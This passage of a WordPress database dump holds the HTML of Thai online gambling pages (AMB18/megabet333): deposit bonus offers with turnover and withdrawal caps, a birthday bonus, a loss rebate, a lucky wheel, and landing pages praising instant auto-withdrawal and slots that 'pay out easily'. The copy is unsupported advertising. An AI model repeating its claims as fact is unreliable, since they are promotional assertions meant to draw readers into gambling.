32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/79-get-200-Banner-AMB18.webp\" alt=\"โปรโมชั่น\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/79-get-200-Banner-AMB18.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/79-get-200-Banner-AMB18-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/79-get-200-Banner-AMB18-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/79-get-200-Banner-AMB18-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>โปร 79 รับ 200</h2> <p style=\"text-align: center;\">ฝาก 79 → รับเพิ่ม 121 = รวม 200 / ทำเทิร์น 7 เท่า / ถอนได้สูงสุด 600</p><p><strong>สรุปเงื่อนไข</strong></p><ul><li data-start=\"798\" data-end=\"837\"><strong data-start=\"996\" data-end=\"1012\">การทำเทิร์น</strong> 7 เท่า ของยอดรวม</li><li data-start=\"798\" data-end=\"837\">เฉพาะสล็อตเท่านั้น</li><li data-start=\"798\" data-end=\"837\">ห้ามซื้อฟรีสปิน</li></ul> <a href=\"http://luca333line.com\" target=\"_blank\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Bonus-free-100_-Banner-AMB18.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Bonus-free-100_-Banner-AMB18.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/Bonus-free-100_-Banner-AMB18-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Bonus-free-100_-Banner-AMB18-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/Bonus-free-100_-Banner-AMB18-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>โปรรับโมบัส 100%</h2> <p style=\"text-align: center;\" data-start=\"696\" data-end=\"740\"><strong data-start=\"696\" data-end=\"711\">คุ้มสองเด้ง</strong> เติมเท่าไรรับเพิ่มเท่านั้น</p><ul><li data-start=\"696\" data-end=\"740\"><strong data-start=\"743\" data-end=\"758\">100 รับ 200</strong></li><li data-start=\"696\" data-end=\"740\"><strong data-start=\"763\" data-end=\"780\">500 รับ 1,000</strong></li></ul><p><strong>สรุปเงื่อนไข</strong></p><ul><li data-start=\"798\" data-end=\"837\"><strong data-start=\"798\" data-end=\"813\">ทำ 6 เทิร์น</strong>, <strong data-start=\"815\" data-end=\"835\">ถอนสูงสุด 3 เท่า</strong></li><li data-start=\"798\" data-end=\"837\">ก่อนถอน <strong data-start=\"848\" data-end=\"886\">ระบบตัดเครดิตโปรโมชั่น (ส่วนโบนัส)</strong> ออกโดยอัตโนมัติ เหลือยอดเงินจริงสำหรับถอน</li><li data-start=\"798\" data-end=\"837\">จำกัดสิทธิ์ <strong data-start=\"945\" data-end=\"967\">1 ครั้ง/วัน/ผู้ใช้</strong></li></ul> <a href=\"http://luca333line.com\" target=\"_blank\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/HBD-Banner-AMB18.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/HBD-Banner-AMB18.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/HBD-Banner-AMB18-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/HBD-Banner-AMB18-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/HBD-Banner-AMB18-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>Happy Birthday Bonus </h2> <p style=\"text-align: center;\" data-start=\"1415\" data-end=\"1466\">🎁 ฉลองเดือนเกิด รับของขวัญตามยอดฝากสะสมภายในเดือนนั้น <br />(รับได้ตลอดทั้งเดือนเกิด)</p><ul><li data-start=\"1469\" data-end=\"1515\">ยอดฝากสะสม <strong data-start=\"1480\" data-end=\"1496\">3,000 ขึ้นไป</strong> → <strong data-start=\"1499\" data-end=\"1513\">รับฟรี 300</strong></li><li data-start=\"1469\" data-end=\"1515\">ยอดฝากสะสม <strong data-start=\"1529\" data-end=\"1542\">500–2,999</strong> → <strong data-start=\"1545\" data-end=\"1555\">รับ 50</strong></li><li data-start=\"1469\" data-end=\"1515\">ยอดฝากสะสม <strong data-start=\"1571\" data-end=\"1586\">ไม่เกิน 500</strong> → <strong data-start=\"1589\" data-end=\"1616\">ฝากเท่าไร รับเพิ่ม 100%</strong></li></ul><p data-start=\"271\" data-end=\"387\"><strong data-start=\"371\" data-end=\"387\">สรุปเงื่อนไข</strong></p><ul><li data-start=\"1634\" data-end=\"1680\"><strong data-start=\"1634\" data-end=\"1653\">ทำเทิร์น 5 เท่า</strong>, <strong data-start=\"1655\" data-end=\"1678\">ถอนได้สูงสุด 3 เท่า</strong></li><li data-start=\"1634\" data-end=\"1680\">ยืนยันสิทธิ์โดย <strong data-start=\"1699\" data-end=\"1727\">แจ้งบัตรประชาชนกับแอดมิน</strong></li></ul> <a href=\"http://luca333line.com\" target=\"_blank\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Reward-10_-Banner-AMB18.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Reward-10_-Banner-AMB18.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/Reward-10_-Banner-AMB18-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Reward-10_-Banner-AMB18-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/Reward-10_-Banner-AMB18-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>คืนยอดเสีย 10%</h2> <p style=\"text-align: center;\" data-start=\"1088\" data-end=\"1118\">เสียไม่เสียเปล่า! ระบบ <strong data-start=\"1844\" data-end=\"1878\">แปลงยอดเสียเป็นแต้ม Reward 10%</strong> <br />นำแต้มไปลุ้นใหมหรือจะแลกของรางวัลก็ได้ ในหน้าแลกแต้ม</p><p><strong>สรุปเงื่อนไข</strong></p><ul><li data-start=\"1936\" data-end=\"1990\">คิดเป็นเปอร์เซ็นต์จากยอดเสียสุทธิ ตามรอบที่ระบบกำหนด</li><li data-start=\"1936\" data-end=\"1990\">แต้มไม่ใช่เงินสดโดยตรง ต้องนำไปแลกตามรายการที่เปิดให้แลกในขณะนั้น</li></ul> <a href=\"http://luca333line.com\" target=\"_blank\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Lucky-wheel-Banner-AMB18.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Lucky-wheel-Banner-AMB18.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/Lucky-wheel-Banner-AMB18-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Lucky-wheel-Banner-AMB18-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/Lucky-wheel-Banner-AMB18-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>Lucky Wheel กงล้อเสี่ยงโชค </h2> <p style=\"text-align: center;\" data-start=\"1415\" data-end=\"1466\">หมุนลุ้นรางวัลทุกวันด้วยแต้ม <strong data-start=\"75\" data-end=\"85\">Reward</strong> ของคุณ <br />เปลี่ยนแต้มเป็นสิทธิ์หมุน แล้วรับเครดิตโบนัสทันทีหลังจบการหมุน</p><p data-start=\"271\" data-end=\"387\"><strong data-start=\"371\" data-end=\"387\">สรุปเงื่อนไข</strong></p><ul><li data-start=\"197\" data-end=\"252\"><strong data-start=\"197\" data-end=\"250\">20 / 50 / 100 / 150 / 200 / 250 / 300 เครดิตโบนัส</strong></li><li data-start=\"197\" data-end=\"252\"><strong data-start=\"255\" data-end=\"275\">🎁 Mystery Prize</strong> สุ่มรางวัลพิเศษ (เช่น 500 เครดิต <strong data-start=\"310\" data-end=\"318\">หรือ</strong> สปินเพิ่ม +1)</li></ul> <a href=\"http://luca333line.com\" target=\"_blank\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <h2>วิธีการรับโปรโมชั่น</h2> <ul><li data-start=\"2531\" data-end=\"2570\">เข้าสู่ระบบ → ไปที่เมนู <strong data-start=\"2555\" data-end=\"2568\">โปรโมชั่น</strong></li><li data-start=\"2574\" data-end=\"2643\">เลือกโปรที่ต้องการ และกด <strong data-start=\"2599\" data-end=\"2614\">กดรับสิทธิ์</strong> (หรือแจ้งแอดมินตามที่ระบุ)</li><li data-start=\"2647\" data-end=\"2706\">ระบบเครดิตเข้า <strong data-start=\"2662\" data-end=\"2675\">อัตโนมัติ</strong> / หรือหลังยืนยันสิทธิ์สำเร็จ</li><li data-start=\"2710\" data-end=\"2741\">ตรวจสอบสถานะได้ในประวัติธุรกรรม</li></ul> <h2>เงื่อนไข</h2> <ul><li data-start=\"2092\" data-end=\"2176\">โปรทั้งหมดสำหรับ <strong data-start=\"2109\" data-end=\"2138\">1 ผู้ใช้/1 อุปกรณ์/1 ไอพี</strong> ห้ามใช้หลายบัญชีหรือทุจริตทุกรูปแบบ</li><li data-start=\"2179\" data-end=\"2301\">การนับเทิร์นและการถอน <strong data-start=\"2201\" data-end=\"2237\">เป็นไปตามระบบอัตโนมัติของ </strong><b>AMB18 </b>เฉพาะหมวดสล็อต (หากมีหมวดที่ไม่นับเทิร์น ระบบจะแจ้งในหน้าเกม)</li><li data-start=\"2304\" data-end=\"2404\">เมื่อกดรับโปรใดโปรหนึ่ง ถือว่ายอมรับเงื่อนไขของโปรนั้น ๆ และ <strong data-start=\"2365\" data-end=\"2385\">ไม่สามารถซ้อนโปร</strong> ยกเว้นที่ระบุไว้</li><li data-start=\"2407\" data-end=\"2499\"><b>AMB18 ขอสงวนสิทธิ์ปรับปรุง/ยกเลิก</b> โปรโมชั่น และปฏิเสธการจ่ายหากตรวจพบทุจริต/ผิดเงื่อนไข</li></ul>','โปรโมชั่น','','publish','closed','closed','','promotion','','','2026-02-26 19:26:19','2026-02-26 19:26:19','',0,'https://megabet333.biz/?page_id=27',0,'page','',0),(28,3,'2025-10-22 09:21:01','2025-10-22 09:21:01','','โปรโมชั่น','','inherit','closed','closed','','27-revision-v1','','','2025-10-22 09:21:01','2025-10-22 09:21:01','',27,'https://megabet333.biz/?p=28',0,'revision','',0),(29,3,'2025-10-22 09:27:57','2025-10-22 09:27:57','<h1>AMB18 ฝากถอนออโต้ทันสมัย ระบบเร็วสุดในไทย ไม่มีขั้นต่ำ 5 วิเงินเข้า</h1> <p data-pm-slice=\"0 0 []\">เว็บพนัน AMB18 จัดเต็มด้วยระบบฝากถอนออโต้สุดล้ำดีไซน์มาเพื่อสายเล่นที่ต้องการความไวแบบไม่สะดุด ทุกขั้นตอนทำงานอัตโนมัติ 24 ชั่วโมงเต็ม ไม่ต้องทักแอดมินไม่ต้องรอให้เสียจังหวะทำรายการแค่ไม่กี่คลิกก็เรียบร้อย จุดขายที่หลายคนเลิฟคือไม่มีขั้นต่ำในการฝากถอนจะเติมน้อยเติมหนักก็จัดการงบได้ตามสไตล์ตัวเอง ตอบโจทย์ทั้งมือใหม่ที่เพิ่งลองสนาม และสายโปรที่เล่นประจำแค่ไม่กี่วินาทีเงินก็วิ่งเข้าบัญชีแบบทันใจ ระบบเสถียร ลื่นไหล และมีความปลอดภัยสูง รองรับหลายธนาคารชั้นนำในไทย ใช้งานง่ายไม่ซับซ้อน เหมาะกับคนที่อยากได้ทั้งความเร็ว ความคุ้ม และความสะดวกในที่เดียว อย่างไรก็ตาม ควรใช้งานอย่างมีสติ วางแผนการเล่นให้ดี และเปิดให้บริการเฉพาะผู้ที่มีอายุ 18 ปีขึ้นไป เพื่อการใช้งานอย่างรับผิดชอบ</p> <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/3icon-AMB18.webp\" alt=\"ฝากถอนออโต้\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/3icon-AMB18.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/3icon-AMB18-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/3icon-AMB18-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/3icon-AMB18-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>ทำไมระบบฝากถอนออโต้ของเว็บคาสิโนออนไลน์ AMB18 ถึงเร็วกว่าเว็บอื่น</h2> <p data-start=\"2289\" data-end=\"2531\">สิ่งที่ทำให้ <b>AMB18 </b>โดดเด่นเหนือเว็บอื่น คือการใช้เทคโนโลยี <strong data-start=\"2353\" data-end=\"2380\">Auto Transaction System</strong> ที่เชื่อมต่อโดยตรงกับธนาคารและผู้ให้บริการวอเลทในประเทศไทย ซึ่งระบบนี้ถูกนำเข้าจาก USA และได้รับการปรับแต่งให้เหมาะกับการใช้งานของผู้เล่นไทยโดยเฉพาะ</p><p data-start=\"2533\" data-end=\"2575\"><strong>จุดเด่นของระบบฝากถอนออโต้ </strong><b><u>AMB18</u></b></p><ul><li data-start=\"2578\" data-end=\"2668\"><strong data-start=\"2578\" data-end=\"2617\">เชื่อมต่อโดยตรงกับธนาคารหลักทุกแห่ง</strong> เช่น กสิกรไทย, กรุงเทพ, ไทยพาณิชย์, กรุงศรีฯ ฯลฯ</li><li data-start=\"2671\" data-end=\"2753\"><strong data-start=\"2671\" data-end=\"2707\">รองรับ TrueMoney Wallet เต็มระบบ</strong> เหมาะสำหรับผู้เล่นที่ไม่สะดวกใช้บัญชีธนาคาร</li><li data-start=\"2756\" data-end=\"2796\"><strong data-start=\"2756\" data-end=\"2794\">ตรวจจับยอดฝากทันทีด้วย AI อัจฉริยะ</strong></li><li data-start=\"2799\" data-end=\"2866\"><strong data-start=\"2799\" data-end=\"2840\">ระบบความปลอดภัยสูงสุดแบบ 2 ชั้น (2FA)</strong> ป้องกันการโจรกรรมข้อมูล</li><li data-start=\"2869\" data-end=\"2919\"><strong data-start=\"2869\" data-end=\"2903\">ใช้เวลาเพียง 5 วินาทีต่อรายการ</strong> ทั้งฝากและถอน</li></ul><blockquote><p style=\"text-align: center;\" data-start=\"2921\" data-end=\"3018\"><em><b>ด้วยระบบนี้ AMB18 จึงกลายเป็นเว็บพนันที่ทั้ง “เร็ว” และ “เสถียร” ที่สุดในประเทศไทยในขณะนี้</b></em></p></blockquote>','ฝากถอนออโต้','','publish','closed','closed','','auto','','','2026-02-26 19:22:22','2026-02-26 19:22:22','',0,'https://megabet333.biz/?page_id=29',0,'page','',0),(30,3,'2025-10-22 09:27:57','2025-10-22 09:27:57','','ฝากถอนออโต้','','inherit','closed','closed','','29-revision-v1','','','2025-10-22 09:27:57','2025-10-22 09:27:57','',29,'https://megabet333.biz/?p=30',0,'revision','',0),(32,3,'2025-10-22 09:28:51','2025-10-22 09:28:51','<a href=\"https://member.luca333.net/go/luca333\" target=\"_blank\">\n สมัครสมาชิก\n </a>\n <a href=\"https://member.luca333.net/go/luca333\" target=\"_blank\">\n เข้าสู่ระบบ\n </a>\n <a href=\"http://luca333-line.com\" target=\"_blank\">\n ติดต่อเรา\n </a>','header','','publish','closed','closed','','header','','','2026-07-17 11:18:42','2026-07-17 11:18:42','',0,'https://megabet333.biz/?post_type=elementor_library&p=32',0,'elementor_library','',0),(36,3,'2025-10-22 09:35:18','2025-10-22 09:35:18','','header','','inherit','closed','closed','','32-revision-v1','','','2025-10-22 09:35:18','2025-10-22 09:35:18','',32,'https://megabet333.biz/?p=36',0,'revision','',0),(37,3,'2025-10-22 09:35:18','2025-10-22 09:35:18','<a href=\"https://megabetauto.com/auth/register\" target=\"_blank\">\n สมัครสมาชิก\n </a>\n <a href=\"https://megabetauto.com/\" target=\"_blank\">\n เข้าสู่ระบบ\n </a>\n <a href=\"http://mgbline.com\" target=\"_blank\">\n ติดต่อเรา\n </a>','header','','inherit','closed','closed','','32-revision-v1','','','2025-10-22 09:35:18','2025-10-22 09:35:18','',32,'https://megabet333.biz/?p=37',0,'revision','',0),(38,3,'2026-02-26 19:06:23','2025-10-22 09:55:25','มือใหม่ต้องอ่าน! วิธีเล่นสล็อตกับ Megabet333 ให้แตกเร็วแบบเซียน ทำไม เมก้าเบท ถึงถูกจัดเป็นเว็บพนันออนไลน์ที่ปลอดภัยที่สุดในปี 2025','','','publish','closed','closed','','38','','','2026-02-26 19:06:23','2026-02-26 19:06:23','',0,'https://megabet333.biz/?p=38',5,'nav_menu_item','',0),(39,3,'2026-02-26 19:06:23','2025-10-22 09:55:25',' ','','','publish','closed','closed','','39','','','2026-02-26 19:06:23','2026-02-26 19:06:23','',0,'https://megabet333.biz/?p=39',4,'nav_menu_item','',0),(40,3,'2026-02-26 19:06:23','2025-10-22 09:55:25',' ','','','publish','closed','closed','','40','','','2026-02-26 19:06:23','2026-02-26 19:06:23','',0,'https://megabet333.biz/?p=40',3,'nav_menu_item','',0),(41,3,'2026-02-26 19:06:23','2025-10-22 09:55:25',' ','','','publish','closed','closed','','41','','','2026-02-26 19:06:23','2026-02-26 19:06:23','',0,'https://megabet333.biz/?p=41',2,'nav_menu_item','',0),(42,3,'2025-10-22 10:03:22','2025-10-22 10:03:22','<a href=\"https://megabetauto.com/auth/register\" target=\"_blank\">\n สมัครสมาชิก\n </a>\n <a href=\"https://megabetauto.com/\" target=\"_blank\">\n เข้าสู่ระบบ\n </a>\n <a href=\"http://mgbline.com\" target=\"_blank\">\n ติดต่อเรา\n </a>','header','','inherit','closed','closed','','32-revision-v1','','','2025-10-22 10:03:22','2025-10-22 10:03:22','',32,'https://megabet333.biz/?p=42',0,'revision','',0),(43,3,'2025-10-22 10:03:47','2025-10-22 10:03:47','<a href=\"https://megabetauto.com/auth/register\" target=\"_blank\">\n สมัครสมาชิก\n </a>\n <a href=\"https://megabetauto.com/\" target=\"_blank\">\n เข้าสู่ระบบ\n </a>\n <a href=\"http://mgbline.com\" target=\"_blank\">\n ติดต่อเรา\n </a>','header','','inherit','closed','closed','','32-revision-v1','','','2025-10-22 10:03:47','2025-10-22 10:03:47','',32,'https://megabet333.biz/?p=43',0,'revision','',0),(44,3,'2025-10-22 10:04:20','2025-10-22 10:04:20','<img width=\"800\" height=\"800\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-AMB18.webp\" alt=\"AMB18\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-AMB18.webp 800w, https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-AMB18-300x300.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-AMB18-150x150.webp 150w, https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-AMB18-768x768.webp 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" /> <img width=\"800\" height=\"800\" src=\"https://amb18b.com/wp-content/uploads/2026/02/True-wallet-AMB18.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/True-wallet-AMB18.webp 800w, https://amb18b.com/wp-content/uploads/2026/02/True-wallet-AMB18-300x300.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/True-wallet-AMB18-150x150.webp 150w, https://amb18b.com/wp-content/uploads/2026/02/True-wallet-AMB18-768x768.webp 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" /> <h1>AMB18 เว็บยอดนิยม เว็บดังลิขสิทธิ์แท้ เล่นสบาย เริ่ม 1 บาท\n</h1> <p><a href=\"http://amb18slot.com\"><b>AMB18</b></a> เว็บยอดนิยมรวมความมันส์เป็นเว็บดังลิขสิทธิ์แท้ที่เล่นสบายทุกระบบรองรับสายทุนน้อย เริ่ม 1 บาท ครบทุกค่ายเกมดัง อัปเดตใหม่ตลอดเวลาที่นี่รวมทุกความบันเทิงไว้ครบในที่เดียวไม่ว่าจะเป็นสายหมุนสายทำกำไรหรือมือใหม่ที่เพิ่งเริ่มต้นก็สามารถเข้าถึงได้ง่าย ระบบถูกออกแบบมาให้ใช้งานสะดวกภาพลื่นไหลไม่มีสะดุด รองรับทั้งมือถือและคอมพิวเตอร์พร้อมมาตรฐานความปลอดภัยระดับสากล ทำให้ผู้เล่นมั่นใจได้ว่าเงินทุนและข้อมูลส่วนตัวได้รับการดูแลอย่างดี เมื่อรวมกับจุดเด่นเรื่องเริ่มต้นเพียง 1 บาท ยิ่งทำให้แพลตฟอร์มนี้กลายเป็นพื้นที่เล่นเกมที่เข้าถึงได้จริง</p> <h2>สล็อต เว็บ ตรง แตก หนัก 2025 แหล่งรวมเกมอัปเดตเกมเยอะกว่า 1000 ห้องเกม\n</h2> <p>ความโดดเด่นของ <b>สล็อต เว็บ ตรง แตก หนัก 2025 </b>คือการเป็นศูนย์รวมเกมที่อัปเดตใหม่ตลอดทั้งปีภายในระบบมีเกมให้เลือกมากกว่า 1000 ห้องเกม ครอบคลุมทั้งสล็อตคลาสสิก วิดีโอสล็อต และเกมรูปแบบพิเศษที่มาพร้อมฟีเจอร์โบนัสจัดเต็ม </p><p>ผู้เล่นสามารถเลือกแนวที่ชอบได้อย่างอิสระไม่ว่าจะเป็นธีมแฟนตาซี ผจญภัย หรือสไตล์คาวบอยสุดดุเดือด ทุกเกมถูกคัดสรรจากผู้ให้บริการชั้นนำที่มีใบอนุญาตถูกต้อง ทำให้มั่นใจได้ในมาตรฐานความยุติธรรม อีกทั้งระบบยังปรับปรุงความเร็วในการโหลดเกมให้เหมาะกับอินเทอร์เน็ตในประเทศไทย ช่วยให้ทุกการหมุนเป็นไปอย่างลื่นไหลเพิ่มโอกาสลุ้นรางวัลได้แบบเต็มอารมณ์</p> <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Character-3-1-1.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Character-3-1-1.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/Character-3-1-1-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Character-3-1-1-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/Character-3-1-1-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>AMB18 สุดยอดเว็บนำเข้า เว็บดังลิขสิทธิ์แท้ สล็อต เว็บ ตรง แตก ง่าย ล่าสุด มาพร้อมค่ายยอดนิยม\n</h2> <p>จุดแข็งอีกอย่างสุดยอดเว็บนำเข้า เว็บดังลิขสิทธิ์แท้ <b>สล็อต เว็บ ตรง แตก ง่าย ล่าสุด </b>คือการรวบรวมค่ายเกมยอดนิยมจากต่างประเทศมาไว้ในระบบเดียวผู้เล่นไม่ต้องเสียเวลาเปิดหลายเว็บให้วุ่นวาย เพราะที่นี่รวมทุกค่ายดังมาให้ครบทั้งสายภาพสวย กราฟิกจัดจ้าน และสายโบนัสแตกถี่ ระบบเซิร์ฟเวอร์เสถียรทำให้เข้าเกมได้รวดเร็วไม่ต้องรอนาน อีกทั้งยังมีการอัปเดตเวอร์ชันใหม่ทันทีที่ค่ายเกมปล่อยออกมาจึงมั่นใจได้ว่าผู้เล่นจะได้สัมผัสประสบการณ์ล่าสุดก่อนใคร พร้อมระบบฝากถอนอัตโนมัติที่ช่วยให้บริหารเงินทุนได้สะดวกรองรับการเล่นต่อเนื่องแบบไม่สะดุด</p><h3><b>ค่ายเกม PG SLOT</b></h3><p>หนึ่งในค่ายยอดนิยมที่ขาดไม่ได้คือ PG SLOT ซึ่งขึ้นชื่อเรื่องกราฟิกคมชัดและเอฟเฟกต์อลังการ เกมส่วนใหญ่มีฟีเจอร์ฟรีสปินและตัวคูณรางวัลที่กระตุ้นความตื่นเต้นทุกครั้งที่หมุน วงล้อถูกออกแบบให้เข้าใจง่าย เหมาะกับทั้งมือใหม่และสายเก็บกำไร อีกทั้งยังมีอัตราการจ่ายที่สมดุล ทำให้ผู้เล่นรู้สึกถึงโอกาสในการทำกำไรได้จริงการที่ทางเว็บนำเข้าเกมจากค่ายนี้แบบลิขสิทธิ์แท้จึงช่วยเพิ่มความมั่นใจในคุณภาพและทำให้ทุกการสปินเต็มไปด้วยพลังความมันแบบมืออาชีพ</p><h3><b>ค่ายเกม JOKER GAMING</b></h3><p>JOKER GAMING เป็นอีกค่ายที่สายสล็อตรู้จักกันดีในเรื่องเกมแตกง่ายและมีโบนัสหลากหลาย 